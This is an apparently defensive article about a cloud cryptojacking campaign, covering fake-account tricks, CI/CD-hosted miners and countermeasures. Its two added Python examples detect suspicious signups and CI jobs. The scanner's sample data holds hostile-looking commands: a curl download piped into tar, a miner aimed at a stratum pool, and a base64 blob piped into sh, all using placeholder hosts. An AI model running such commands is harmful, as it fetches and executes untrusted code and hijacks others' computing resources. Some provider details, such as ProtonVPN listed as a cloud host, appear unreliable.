    Cryptojacking in the Cloud: How Hackers Exploit Free Computing Resources for Illicit Gains

    Introduction

    The rise of cloud computing has revolutionized the way businesses operate, offering scalable and cost-effective solutions for enterprises worldwide. However, with these advantages comes a growing cybersecurity threat: cryptojacking. This practice involves hackers illicitly using cloud-based resources to mine cryptocurrency, often at the expense of unsuspecting businesses and individuals.

    In late 2024, cybersecurity experts at Netlify uncovered an extensive cryptojacking campaign that exploited cloud infrastructure, including services from Microsoft, ProtonVPN, and other providers. This large-scale attack, which began as early as 2021, highlights the evolving tactics of cybercriminals in the digital age.

    The Anatomy of a Cloud Cryptojacking Campaign

    The Netlify research team found that hackers had been abusing cloud environments by creating thousands of fake accounts. These accounts were linked to hundreds of domains and IP addresses, allowing the attackers to leverage free-tier cloud services for cryptocurrency mining.

    Key Findings from the Investigation

    • Duration and Scope: The attack spanned from September to November 2024, with evidence suggesting that some related activities date back to July 2021.
    • Targeted Cloud Services: Attackers exploited free-tier cloud resources from major providers, including Microsoft, ProtonVPN, Alibaba Cloud, and DigitalOcean.
    • Cryptocurrencies Mined: Initially focused on TideCoin, the hackers later switched to VerusCoin and also mined SugarChain.
    • Financial Impact: Approximately $6,500 in cryptocurrency was mined. However, given the scale of the attack, cloud providers faced an estimated $20,000 to $30,000 per month in wasted computing resources.

    How Hackers Conducted the Attack

    1. Creating and Managing Fake Accounts

    One of the most effective techniques used in this campaign was mass registration of accounts. Cybercriminals utilized email address manipulation techniques such as:

    • Plus Addressing: A method where an email address is modified with a "+" sign to create multiple unique addresses (e.g., user+randomstring@example.com).
    • Subdomain Addressing: Attackers used custom domains to generate thousands of unique but related email addresses.

    More than 3,200 fake email addresses were detected, with most originating from six private domains registered between 2023 and 2024.
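
    Seen from the registration side, both address tricks collapse back to a small number of mailboxes and domains. The following added example (not code from the Netlify research or from this article) groups signups that way; the sample addresses, the threshold of 3, and the two-label shortcut for the registrable domain are assumptions.

```python
from collections import defaultdict

# Constructed sample signups, not data from the campaign; domains are placeholders.
SAMPLE_SIGNUPS = [
    "builder+a91f@example.com",
    "builder+77c2@example.com",
    "builder+zz01@example.com",
    "dev1@k3x.mail-farm.example",
    "ops@p9q.mail-farm.example",
    "ci@t7m.mail-farm.example",
    "alice@example.org",
]


def split_address(address, domain_labels=2):
    """Return (mailbox without "+tag", subdomain part, registrable domain).

    Assumption: the registrable domain is the last `domain_labels` labels.
    Production code should consult the Public Suffix List instead.
    """
    local, _, domain = address.strip().lower().rpartition("@")
    if not local or not domain:
        raise ValueError(f"not an email address: {address!r}")
    labels = domain.rstrip(".").split(".")
    base = ".".join(labels[-domain_labels:])
    sub = ".".join(labels[:-domain_labels])
    return f"{local.split('+', 1)[0]}@{domain}", sub, base


def find_clusters(addresses, threshold=3):
    """Flag mailboxes reused via plus tags and domains fanned out via subdomains."""
    same_mailbox = defaultdict(set)  # mailbox -> raw addresses that map to it
    fanout = defaultdict(set)        # registrable domain -> distinct subdomains
    for addr in addresses:
        try:
            mailbox, sub, base = split_address(addr)
        except ValueError:
            continue  # malformed input is skipped, not grouped
        same_mailbox[mailbox].add(addr.strip().lower())
        if sub:
            fanout[base].add(sub)
    return {
        "plus_tag": {k: sorted(v) for k, v in same_mailbox.items() if len(v) >= threshold},
        "subdomain": {k: sorted(v) for k, v in fanout.items() if len(v) >= threshold},
    }


if __name__ == "__main__":
    print(find_clusters(SAMPLE_SIGNUPS))
```

    Counting distinct subdomains per registrable domain, rather than addresses per domain, keeps large public mail providers from being flagged simply for having many users.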

    2. Deploying Malicious Cryptomining Scripts

    Hackers hosted their cryptomining scripts on repositories such as Bitbucket and GitLab. These scripts were then executed through cloud computing environments, using CI/CD tools to bypass detection.

    Netlify's investigation revealed eight different script execution strategies, showing that attackers adapted their methods to avoid detection. The scripts typically:

    • Downloaded cryptominer binaries onto cloud infrastructure.
    • Executed mining commands to contribute computing power to predefined wallets.
    • Used obfuscation techniques to evade monitoring.
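
    A defender reviewing CI/CD job definitions can look for the three behaviors listed above. The following added example (not taken from the campaign's scripts or from Netlify's tooling) scans job commands for a download piped into execution, a mining pool URL, and one layer of base64 hiding either; the `stratum+tcp://` scheme used by mining pool clients, the rule names, and the sample job are assumptions not found in the article.

```python
import base64
import binascii
import re

# Constructed CI job commands for illustration; hosts and wallet are placeholders.
_HIDDEN = base64.b64encode(b"./tool -o stratum+tcp://pool.example.invalid:3333").decode()
SAMPLE_JOB = [
    "npm ci",
    "curl -sL https://files.example.invalid/tool.tar.gz | tar xz",
    "./tool -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER",
    f"echo {_HIDDEN} | base64 -d | sh",
]

# Hypothetical rule set: one pattern per behavior described in the list above.
RULES = {
    "stratum_url": re.compile(r"stratum\+(?:tcp|ssl|tls)://[\w.-]+(?::\d+)?", re.I),
    "fetch_and_pipe": re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:tar|sh|bash)\b"),
    "decode_and_exec": re.compile(r"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:sh|bash)\b"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def scan_line(text, depth=0):
    """Return sorted rule names matching text, looking through one base64 layer."""
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    if depth == 0:
        for blob in B64_BLOB.findall(text):
            try:
                raw = base64.b64decode(blob, validate=True)
            except (binascii.Error, ValueError):
                continue  # long token that is not valid base64
            decoded = raw.decode("utf-8", "ignore")
            hits |= {f"base64:{h}" for h in scan_line(decoded, depth=1)}
    return sorted(hits)


def scan_job(lines):
    """Return {line_number: [rule names]} for lines with at least one hit."""
    report = {}
    for n, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            report[n] = hits
    return report


if __name__ == "__main__":
    for n, hits in scan_job(SAMPLE_JOB).items():
        print(n, hits)
```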

    3. Utilizing Compromised Cloud Services

    The attackers took advantage of free-tier plans provided by cloud service providers. Each free plan offers only limited computing power, but because these plans carry no verification requirements, hackers could combine many accounts to generate significant hashing power without incurring direct costs.

    During the campaign, Microsoft Cloud alone saw over 2,400 fraudulent account registrations, followed by significant activity from Telkom Indonesia, ProtonVPN, and Datacamp.

    The Financial and Security Implications

    While $6,500 in direct cryptocurrency earnings may seem insignificant, the true cost of such attacks lies in the cloud infrastructure expenses borne by providers and businesses. The excessive consumption of computing power disrupts legitimate cloud operations, leading to:

    • Higher operational costs for cloud service providers.
    • Slower performance for affected businesses.
    • Increased security risks, as cryptojacking scripts can be leveraged for more severe cyber threats.

    A single cryptojacking campaign can force cloud companies to spend tens of thousands of dollars per month to mitigate the impact, making it a costly problem for the industry.

    How Companies Can Defend Against Cryptojacking

    1. Monitor Cloud Activity and Resource Usage

    Organizations should implement real-time monitoring tools to detect unusual spikes in CPU and GPU usage. Since cryptojacking often results in excessive resource consumption, any unexplained surge should be investigated.

    2. Strengthen Account Verification and Security Policies

    Cloud service providers must enhance their identity verification processes to prevent mass registration of fraudulent accounts. Recommended measures include:

    • Implementing multi-factor authentication (MFA).
    • Restricting free-tier accounts based on usage behavior.
    • Monitoring IP addresses associated with suspicious activities.

    3. Implement Threat Intelligence and Detection Mechanisms

    Security teams should deploy behavior-based anomaly detection to flag activities associated with cryptomining. Advanced endpoint security solutions can:

    • Identify known cryptomining binaries.
    • Block unauthorized script execution.
    • Detect and shut down unauthorized outbound traffic to mining pools.

    4. Enforce Network Restrictions and Traffic Analysis

    Cryptojackers often connect to known mining pools. Companies can mitigate this by:

    • Blocking access to mining pool IP addresses and associated domains.
    • Using intrusion detection systems (IDS) to analyze outbound network traffic.

    5. Educate Employees and IT Teams

    Awareness is key to preventing cryptojacking. IT teams should be trained to recognize:

    • The signs of cryptojacking, such as unexpected system slowdowns.
    • How to identify unauthorized scripts running in cloud environments.
    • Best practices for securing cloud resources against abuse.

    Conclusion

    The cryptojacking campaign uncovered by Netlify is a stark reminder of how cybercriminals exploit cloud computing vulnerabilities for financial gain. As cloud adoption continues to grow, businesses must stay vigilant, implement proactive security measures, and invest in advanced threat detection strategies.

    By taking a multi-layered approach to cloud security, organizations can mitigate the risks of cryptojacking and safeguard their computing resources from exploitation.
